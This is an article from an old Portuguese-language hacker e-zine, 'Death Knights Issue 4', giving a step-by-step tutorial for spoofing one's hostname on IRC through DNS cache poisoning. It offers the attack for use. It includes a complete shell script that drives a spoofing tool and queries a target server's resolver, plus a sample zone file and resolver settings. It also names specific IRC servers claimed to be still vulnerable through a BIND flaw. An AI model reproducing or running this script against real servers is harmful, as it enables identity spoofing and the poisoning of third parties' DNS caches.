Copy Link
Add to Bookmark
Report
Como spoofar localmente
Death Knights Issue 4
by BK
Hi d0oDz!
bom... pra criancada que sempre quis spoofar e nao tem shell pra isso, e' simples .. basta seguir esses passos:
(no final colocarei um exemplo de tudo)
- Va na ml.org ou dyndns.com e crie um dominio dinamico pra voce
- Pegue o jizz (se vc nao achar nao tem problema.. to mandando junto com a TDK).
- Configure e rode o named na sua maquina.
- Agora a parte mais dificil, consiga com alguem que tem shell ou entao algum lugar que forneca NS free (procure q vc acha) e coloque IN NS com seu dominio dinamico.
- Agora configure seu database (do named da sua maquina)
- Depois de tudo configurado e funcionando, kille seu named e execute este script
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#!/bin/sh
#Script por ][MoSCa][ - BrasNET
HOST=$RANDOM
NSDOMAIN=your.ns.org #domain we control
DEVICE=ppp0 #name of device we want to use
MEUIP=$1
if [ $# -ne '3' ]; then
echo "usage: $0 <Ip> <Spoof> <Irc Server>"
exit
fi
killall jizz
sleep 1
jizz $HOST.$NSDOMAIN $NSDOMAIN $MEUIP $NSDOMAIN $MEUIP $2 &
nslookup <<END > /dev/null 2> /dev/null
server $3
set q=soa
$HOST.$NSDOMAIN
exit
END
RESULT=`nslookup $MEUIP $3 | grep Name | cut -d ":" -f2`
echo
echo -= $RESULT IN A $MEUIP =-
echo
sleep 1
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Como usar:
bash# script <seu.ip> <seu.spoof> <irc.server>
(o jizz deve estar no mesmo diretorio q este script)
exemplo de database
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
@ IN SOA your.ns.org. root.your.ns.org. (
980131170 ; Serial
300 ; Refresh
120 ; Retry
660 ; Expire
600) ; TTL
IN NS seu.dominio-dinamico.org.
www IN A 200.200.200.200
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
no /etc/resolv.conf nao use 127.0.0.1 como nameserver pois apartir da hora q vc killar o named nao vai resolver mais nada na sua maquina entao coloque por exemplo:
domain convex.com.br
nameserver 200.210.55.241
tudo certo, so tentar.
PS: Irc Server com Vulnerabilidade no Bind (eu acho q ainda funciona)
BrasNET
irc.certto.com.br
BrasIRC
irc.eribeiro.com.br
bom, e' isso... se nao entendeu leia de novo, leia outros documentos ou qualquer outra coisa, menos ficar me mandando PVT no IRC
cYa d0oDz!
Bloody Killer bk@deathknights.com
`'`'`'`'`'`'` `'`'`'`'`'`'`'`'`'`